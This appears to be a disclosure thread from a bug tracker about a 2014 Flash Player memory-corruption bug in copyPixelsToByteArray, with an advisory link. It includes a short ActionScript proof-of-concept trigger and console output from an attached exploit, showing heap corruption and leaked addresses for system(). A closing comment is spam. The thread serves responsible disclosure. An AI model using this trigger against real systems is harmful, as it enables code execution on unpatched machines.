Closed GoogleCodeExporter closed 9 years ago
Original comment by cev...@google.com
on 14 Jul 2014 at 7:38
Original comment by cev...@google.com
on 15 Jul 2014 at 5:22
Original comment by cev...@google.com
on 5 Sep 2014 at 11:00
Eep. This bug is actually really nasty on 32-bit, can't believe I missed it.
Repro from nicolas joly
var ba:ByteArray = new ByteArray();
ba.position = 0xFFFFF0004;
var bd:BitmapData = new BitmapData(0x100,0x100,true,0x12345678);
bd.copyPixelsToByteArray(new Rectangle(0,0,0x80,0x80), ba);
Original comment by cev...@google.com
on 9 Sep 2014 at 8:11
http://helpx.adobe.com/security/products/flash-player/apsb14-21.html
Will derestrict in a week or so, etc.
Original comment by cev...@google.com
on 9 Sep 2014 at 8:15
Attaching a sample exploit for an old version of pepper Flash, 64-bit Linux.
Sample output to the browser JavaScript console:
---
And so it begins!
Starting search for trashed Vector
Found Vector with trashed length, num: 5
Found a Vector.<uint>, pos: 3332128
buffer address: 0x7fda9df9ad50
vtable value: 0x7fdaa3508d10
Found the specific Vector.<uint>, index: 2282
Found a ByteArray, pos: 3517486
Found the specific ByteArray, index: 5000
Current length is: 32
New length is: 1633771873
address of system plt: 0x7fdaa35a2050
address of system: 0x7fdab530a650
ByteArray vtable value: 0x7fdaa3515020
---
Original comment by cev...@google.com
on 22 Sep 2014 at 7:26
Attachments:
Making public.
Original comment by cev...@google.com
on 23 Sep 2014 at 7:29
[deleted comment]
thank you very much http://wdfshare.blogspot.com
Original comment by the961be...@gmail.com
on 17 Mar 2015 at 7:46
Original issue reported on code.google.com by
cev...@google.com
on 14 Jul 2014 at 7:36Attachments: